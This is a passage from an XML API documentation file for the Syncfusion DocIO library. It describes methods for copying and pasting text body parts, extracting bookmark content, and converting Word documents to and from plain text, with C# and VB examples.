        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.Copy(Syncfusion.DocIO.DLS.TextBodySelection)">
            <summary>
            Copies the text from the specified <see cref="T:Syncfusion.DocIO.DLS.TextBodySelection"/> 
            and adds the text to the current <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>.
            </summary>
            <param name="textSel">The <see cref="T:Syncfusion.DocIO.DLS.TextBodySelection"/> to copy the text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.Copy(Syncfusion.DocIO.DLS.TextBodyItem,System.Boolean)">
            <summary>
            Copies the specified <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> and 
            adds it to the current <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>.
            </summary>
            <param name="bodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> to copy the contents.</param>
            <param name="clone"><b>True</b> if to clone and add the item; otherwise, <b>false</b>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.Copy(Syncfusion.DocIO.DLS.ParagraphItem,System.Boolean)">
            <summary>
            Copies the specified <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> and adds the item in a new paragraph 
            to the current <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>.
            </summary>
            <param name="pItem">The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> to be copied.</param>
            <param name="clone"><b>True</b> if to clone and add the item; otherwise, <b>false</b>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.GetAsWordDocument">
            <summary>
            Returns the content of the text body part as a new Word document.
            </summary>
            <returns>The newly created <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.Close">
            <summary>
            Clears all the contents of the text body part.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.Copy(Syncfusion.DocIO.DLS.WTextBody,System.Boolean)">
            <summary>
            Copies the specified text body.
            </summary>
            <param name="textBody">The text body.</param>
            <param name="clone">if it is to clone, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.PasteAfter(Syncfusion.DocIO.DLS.TextBodyItem)">
            <summary>
            Pastes the <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> at the index next to it.
            </summary>
            <param name="bodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> which is to be pasted.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.PasteAfter(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Pastes the <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> after specified paragraph item index.
            </summary>
            <param name="paragraphItem">The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> to be pasted.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.PasteAt(Syncfusion.DocIO.DLS.ITextBody,System.Int32)">
            <summary>
            Pastes at specified <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> at the specified index.
            </summary>
            <param name="textBody">The <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> to be pasted.</param>
            <param name="itemIndex">The zero-based index to paste the text body.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.PasteAt(Syncfusion.DocIO.DLS.ITextBody,System.Int32,System.Int32,Syncfusion.DocIO.DLS.WCharacterFormat,System.Boolean)">
            <summary>
            Pastes at specified position with character formatting.
            </summary>
            <param name="textBody">>The text body.</param>
            <param name="itemIndex">Index of the item.</param>
            <param name="pItemIndex">Index of the p item.</param>
            <param name="format">Replace character format</param>
            <param name="applyFormat">if it specifies to apply the format, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.PasteAt(Syncfusion.DocIO.DLS.ITextBody,System.Int32,System.Int32)">
            <summary>
            Pastes at specified position.
            </summary>
            <param name="textBody">The text body.</param>
            <param name="itemIndex">Index of the item.</param>
            <param name="pItemIndex">Index of the p item.</param>
            <example>
            <code language = "C#">
            //Open the template document
            WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
            //Create the bookmark navigator instance to access the bookmark
            BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
            //Move the virtual cursor to the before the end location of the bookmark "Northwind"
            bookmarkNavigator.MoveToBookmark("Northwind");
            //Get the bookmark content as a text body part.
            TextBodyPart part = bookmarkNavigator.GetBookmarkContent();             
            //Paste the content as first item in the second paragraph.
            part.PasteAt(document.Sections[0].Body, 1, 0);
            //Save and close the document
            document.Save("Result.docx", FormatType.Docx);
            document.Close();
            </code>
            <code language = "VB">
            'Open the template document
            Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
            'Create the bookmark navigator instance to access the bookmark
            Dim bookmarkNavigator As New BookmarksNavigator(document)
            'Move the virtual cursor to the before the end location of the bookmark "Northwind"
            bookmarkNavigator.MoveToBookmark("Northwind")
            'Get the bookmark content as a text body part.
            Dim part As TextBodyPart = bookmarkNavigator.GetBookmarkContent()
            'Paste the content as first item in the second paragraph.
            part.PasteAt(document.Sections(0).Body, 1, 0)
            'Save and close the document
            document.Save("Result.docx", FormatType.Docx)
            document.Close()
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.PasteAtEnd(Syncfusion.DocIO.DLS.ITextBody)">
            <summary>
            Pastes at end of textbody.
            </summary>
            <param name="textBody">The text body.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.PasteAt(Syncfusion.DocIO.DLS.ITextBody,System.Int32,System.Int32,System.Boolean)">
            <summary>
            Pastes at specified position.
            </summary>
            <param name="textBody">The text body.</param>
            <param name="itemIndex">Index of the item.</param>
            <param name="pItemIndex">Index of the p item.</param>
            <param name="isBkmkReplace">Set to <c>true</c> when performing bookmark replace functionality</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.CopyParagraphItems(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Copies the paragraph items.
            </summary>
            <param name="srcParagraph">The source paragraph.</param>
            <param name="destParagraph">The dest paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.SplitParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Splits the paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="nextpItemIndex">Index of the next paragraph item.</param>
            <param name="paragraphToInsert">The paragraph to insert.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.ValidateArgs">
            <summary>
            Validates the args.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.SplitParagraph(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Splits the paragraph.
            </summary>
            <param name="trgFirstParagraph">The TRG first paragraph.</param>
            <param name="srcLastParagraph">The SRC last paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.UpdateFormatting(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Updates fromatting from source to destination.
            </summary>
            <param name="trgParagraph"></param>
            <param name="srcParagraph"></param>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.EnsureTextBody(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Ensures the text body.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.ApplySrcFormat(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Applies the source format.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.ApplySrcFormat(Syncfusion.DocIO.DLS.WTable,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Applies the source format.
            </summary>
            <param name="table">The Table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.GetBookmarkContentPart(Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Gets the bookmark content in between various section/cell in the Word document
            </summary>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookamrk end</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.GetSection(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the owner section index
            </summary>
            <param name="entity">The entity</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.GetTableAfteParagraphBkmkContent(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Gets the bookmark content inside table after paragraph in same/multiple section. 
            </summary>
            <param name="paragraphStart">Bookmark start owner paragraph</param>
            <param name="paragraphEnd">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookamark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.GetParagraphAfterTableBkmkContent(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Gets the bookmark content inside paragraph after table in single/multiple section
            </summary>
            <param name="paragraphStart">Bookmark start owner paragraph</param>
            <param name="paragraphEnd">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Curretn bookmark end</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.GetTableBookmarkContent(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd,Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Gets the bookmark content inside table in single/multiple section
            </summary>
            <param name="paragraphStart">Bookmark start owner paragraph</param>
            <param name="paragraphEnd">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
            <param name="bkmkEndCell">Bookmark end cell is null,if bookmark end entity placed inside table next paragraph means set bookmark end cell</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.AddTextBodyItems(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Copy the textbody items
            </summary>
            <param name="startItemIndex">Start textbody index</param>
            <param name="endItemIndex">End textbody index</param>
            <param name="textBody">The textbody</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.GetParagraphBookmarkContent(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Gets the bookmark content inside paragraph in single/multiple section.
            </summary>
            <param name="paragraphStart">Bookmark start owner paragraph</param>
            <param name="paragraphEnd">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.CopyBkmkStartTextBody(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTextBody,System.Int32,System.Int32,System.Boolean)">
            <summary>
            Inserts the bookmark start textbody items into single text body
            </summary>
            <param name="startParagraphIndex">Bookmark start owner paragraph owner index</param>
            <param name="endParagraphIndex">Bookmark end owner paragraph owner index</param>
            <param name="startTextBody">Bookmark start owner textbody</param>
            <param name="bkmkStartNextItemIndex">Bookmark start next item index</param>
            <param name="bkmkEndPrevItemIndex">Bookmark end previous item index</param>
            <param name="isInParagraph">When bookmark start and end in paragraph set to <c>true</c></param>
            <param name="isInSingleSection">When bookmark start owner section and bookmark end owner section index same, set to  <c>true</c></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.CopyBkmkEndTextBody(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTextBody,System.Boolean,System.Boolean)">
            <summary>
            Inserts the bookmark end owner textbody item into single textbody
            </summary>
            <param name="endParagraphIndex">Bookmark end owner paragraph index</param>
            <param name="bkmkEndPreviosItemIndex">Bookmark end previous item index</param>
            <param name="endTextBody">Bookmark end owner text body</param>
            <param name="IsFirstBkmkEnd">When true ,if the bookmark end entity is first item of it's owner paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.IsBkmkEndInFirstItem(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkEnd,System.Int32)">
            <summary>
            To check the bookmark end entity is first item of it's owner paragraph
            </summary>
            <param name="paragraph">Bookmark end owner paragraph</param>
            <param name="bkmkEnd">Current bookmark end</param>
            <param name="bkmkEndPreItemIndex">Bookmark end previous item index</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.CopyMultiSectionBodyItems(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Insert the in between section bodyitem into single textbody
            </summary>
            <param name="startSectionIndex">Bookmarkstart owner next section index</param>
            <param name="endSectionIndex">Bookmark end owner section index</param>
            <param name="Document">Owner document</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodyPart.BodyItems">
            <summary>
            Gets the collection text body items. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.BodyItemCollection"/> instance.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WordDocumentPart">
            <summary>
            Represents a collections of sections.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordDocumentPart"/> class. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the WordDocumentPart class and loads the content of the Word document to this instance
            </summary>
            <param name="document">The Word document to load into this <see cref="T:Syncfusion.DocIO.DLS.WordDocumentPart"/></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.Load(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Loads the content of the Word document to this instance.
            </summary>
            <param name="document">The document to load into the current word document part.</param>
            <remarks>WordDocumentPart contains the copy of sections from the documents. When you modify the content of the WordDocumentPart, it does not affect the objects inside the document.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.GetAsWordDocument">
            <summary>
            Gets the content of document part as new Word document.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> contains the content of this <see cref="T:Syncfusion.DocIO.DLS.WordDocumentPart"/></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.Close">
            <summary>
            Closes all the contents of the document part.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.GetWordDocumentPart(Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Get the bookmark content in beween different text body
            </summary>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.GetSection(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the owner section
            </summary>
            <param name="entity">Entity</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.GetParagraphAfterTableDocumentPart(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Get the bookmark content in between paragraph after table
            </summary>
            <param name="startParagraph">Bookmark start owner paragraph</param>
            <param name="endParagraph">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.GetTableAfterParagraphDocumentPart(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Get bookmark content in between table after paragraph in same/different section
            </summary>
            <param name="startParagraph">Bookmark start owner paragraph</param>
            <param name="endParagraph">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.GetTableDocumentPart(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd,Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Get the bookamrk content in between same/multiple table
            </summary>
            <param name="startParagraph">Bookmark start owner paragraph</param>
            <param name="endParagraph">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
            <param name="bkmkEndCell">Bookmark end cell is null,if bookmark end entity placed inside table next paragraph means set bookmark end cell</param>
            //The previous sibling of bookmarkendparagraph is WTable,then get the bookmarkendcell from previous sibling of bookmarkend paragraph and get the last cell of the Table.
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.AddSectionBodyItems(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Copy textbody items
            </summary>
            <param name="startItemIndex">Textbodyitem start index</param>
            <param name="endItemIndex">Textbodyitem end index</param>
            <param name="textBody">The textbody</param>
            <param name="section">The section</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.GetParagraphDocumentPart(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Get the bookmark content inbetween same/different section paragraph.
            </summary>
            <param name="paraStart">Bookmark start owner paragraph</param>
            <param name="paraEnd">Bookmark end owner paragraph</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.AddLastSectionToDocumentPart(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTextBody,System.Boolean,System.Boolean)">
            <summary>
            If the bookmark content inside different section, combine bookmark end owner section to Sections collection
            </summary>
            <param name="endParagraphIndex">Bookmark end owner paragraph index</param>
            <param name="bkmkEndPreviosItemIndex">Bookmark end previous item index</param>
            <param name="endTextBody">Bookmark end owner text body</param>
            <param name="IsFirstBkmkEnd">When true ,if the bookmark end entity is first item of it's owner paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.AddInBetweenSections(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Insert the in between sections to section collection
            </summary>
            <param name="startSectionIndex">Bookmark start's next section index</param>
            <param name="endSectionIndex">Bookmark end section index</param>
            <param name="document">Owner document</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.AddFirstSectionToDocumentPart(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTextBody,System.Int32,System.Int32,System.Boolean,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            If the bookmark content inside different section, combine bookmark start owner section to Sections collection
            </summary>
            <param name="startParagraphIndex">BookmarkStart owner paragraph index</param>
            <param name="endParagraphIndex">Bookmark end owner paragraph index</param>
            <param name="startTextBody">Bookmark start owner textbody</param>
            <param name="bkmkStartNextItemIndex">Bookmark start next item index</param>
            <param name="bkmkEndPreviosItemIndex">Bookmark end previous item index</param>
            <param name="isInSingleSection">If the bookmark content preserved in single section set to <c>true</c></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocumentPart.IsBkmkEndInFirstItem(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.ParagraphItem,System.Int32)">
            <summary>
            To check the bookmark end entity is first item of it's owner paragraph
            </summary>
            <param name="paragraph">Bookmark end owner paragraph</param>
            <param name="bkmkEnd">Current bookmark end</param>
            <param name="bkmkEndPreviosItemIndex">Bookmark end previous item index</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordDocumentPart.Sections">
            <summary>
            Gets the sections in the Word document part. Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextConverter">
            <summary>
            Provides the functionalities to convert the Word document as text file.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextConverter.m_writer">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextConverter.m_curSectionIndex">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextConverter"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.GetText(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Returns the text contents of the specified <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> as string.
            </summary>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <returns>The <b>string</b> that represents the text contents of the Word document.</returns>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open a new Word document
                WordDocument document = new WordDocument("Template.docx");
                //Initialize a new instance of TextConverter class
                TextConverter converter = new TextConverter();
                //Get the text contents from the template document
                string text = converter.GetText(document);
                //Create new Word document
                WordDocument textDocument = new WordDocument();
                textDocument.EnsureMinimal();
                //Add the text to the newly created document
                textDocument.LastParagraph.AppendText(text);
                //Save and close the document.
                textDocument.Save("Sample.txt", FormatType.Txt);
                document.Close();
                textDocument.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open a new Word document
                Dim document As New WordDocument("Template.docx")
                'Initialize a new instance of TextConverter class
                Dim converter As New TextConverter()
                'Get the text contents from the template document
                Dim text As String = converter.GetText(document)
                'Create new Word document
                Dim textDocument As New WordDocument()
                textDocument.EnsureMinimal()
                'Add the text to the newly created document
                textDocument.LastParagraph.AppendText(text)
                'Save and close the document.
                textDocument.Save("Sample.txt", FormatType.Txt)
                document.Close()
                textDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.Write(System.IO.StreamWriter,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Writes the specified <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> text contents as text file(.txt format).
            </summary>
            <param name="writer">The <see cref="T:System.IO.StreamWriter"/> instance to write the text file.</param>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to be converted as text file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.Read(System.IO.StreamReader,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Reads the text file and convert it to the specified <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/>.
            </summary>
            <param name="reader">The <see cref="T:System.IO.StreamReader"/> instance to read the text file.</param>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance to represent the text file.</param>
            <example>
            <para>The following code example demonstrates how to write the text file content to Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                FileStream fs = new FileStream("Result.txt", FileMode.Open, FileAccess.Read);
                StreamReader reader = new StreamReader(fs);
                reader.BaseStream.Position = 0;
                //Create the new TextConverter
                TextConverter txtConverter = new TextConverter();
                //Write the text file to document
                txtConverter.Read(reader, document);
                reader.Dispose();
                fs.Dispose();
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                Dim fs As New FileStream("Result.txt", FileMode.Open, FileAccess.Read)
                Dim reader As New StreamReader(fs)
                reader.BaseStream.Position = 0
                'Create the new TextConverter
                Dim txtConverter As New TextConverter()
                'Write the text file to document
                txtConverter.Read(reader, document)
                reader.Dispose()
                fs.Dispose()
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.Read(System.String,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Reads the specified text.
            </summary>
            <param name="text">The text.</param>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.InitBuiltinDocumentProperties(System.String,System.String[],Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            
            </summary>
            <param name="textLines"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.WriteHFBody(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Writes the specified <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> header and footer body contents.
            <exclude/>
            </summary>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.WriteBody(Syncfusion.DocIO.DLS.ITextBody)">
            <summary>
            Writes the specified document <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> content to the text file.
            <exclude/>
            </summary>
            <param name="body">The <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> instance content to write into text file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.WriteParagraph(Syncfusion.DocIO.DLS.IWParagraph,System.Boolean)">
            <summary>
            Writes the specified <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> content to the text file.
            <exclude/>
            </summary>
            <param name="paragraph">The <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> instance to write into the text file.</param>
            <param name="lastPara"><b>True</b> if it is the last paragraph; otherwise, <b>false</b>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.WriteTable(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Writes the specified <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> text content to the text file.
            <exclude/>
            </summary>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> instance to write into the text file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.WriteSectionEnd(Syncfusion.DocIO.DLS.IWSection,System.Boolean)">
            <summary>
            Writes the end of the section.
            <exclude/>
            </summary>
            <param name="section">The <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> instance.</param>
            <param name="lastSection"><b>True</b> if it is the last section; otherwise, <b>false</b>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.WriteText(System.String)">
            <summary>
            Writes the text contents to the text file.
            <exclude/>
            </summary>
            <param name="text">The <b>string </b> that specifies the text to write into the text file.</param>
            <example>
            <para>The following code example demonstrates how to write the document content to text file.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                FileStream fs = new FileStream("Result.txt", FileMode.OpenOrCreate, FileAccess.ReadWrite);
                StreamWriter writer = new StreamWriter(fs);
                //Create the new TextConverter
                TextConverter txtConverter = new TextConverter();
                //Write the document to text file
                txtConverter.Write(writer, document);
                writer.Flush();
                writer.Dispose();
                fs.Dispose();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                Dim fs As New FileStream("Result.txt", FileMode.OpenOrCreate, FileAccess.ReadWrite)
                Dim writer As New StreamWriter(fs)
                'Create the new TextConverter
                Dim txtConverter As New TextConverter()
                'Write the document to text file
                txtConverter.Write(writer, document)
                writer.Flush()
                writer.Dispose()
                fs.Dispose()
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.WriteList(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>  
            Writes the list to the text file.
            <exclude/>
            </summary>
            <param name="paragraph">The <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> instance to get the list format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.WriteNewLine">
            <summary>
            Writes new line in the text file.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.UpdateLastPara">
            <summary>
            Updates the last paragraph.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.Write">
            <summary>
            Writes the content of the document to the text file.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.GetFooter(Syncfusion.DocIO.DLS.WSection,System.Int32)">
            <summary>
            Returns the footers referred by the current section
            </summary>
